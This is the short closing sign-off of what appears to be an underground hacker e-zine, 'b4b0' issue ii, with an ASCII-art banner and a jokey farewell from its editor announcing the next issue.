b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0!b4b0! .x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x- -x *sniff* t h e \\=\\=\\=\\=\\ \\=\\ \\=\\=\\ \\=\\=\\=\\ \\=\\ \\=\\=\\ \\=\\ \\=\\ \\=\\ \\=\\=\\=\\=\\ \\=\\ \\=\\ \\=\\ \\=\\ \\=\\ \\=\\ \\=\\ \\=\\ \\=\\ \\=\\=\\=\\=\\ \\=\\ \\=\\ \\=\\=\\=\\ welp friends, family, people of afghanistan, its finally the end. I hope you enjoyed b4b0[ii], because we worked pretty hard to get this shit out in a short amount of time. And if you didn't enjoy b4b0, well, i'd keep your pets inside from now on. Anyways, wait up for b4b0[iii] or die. love, ge0rge. the almighty editor. (till coup or death) F1N.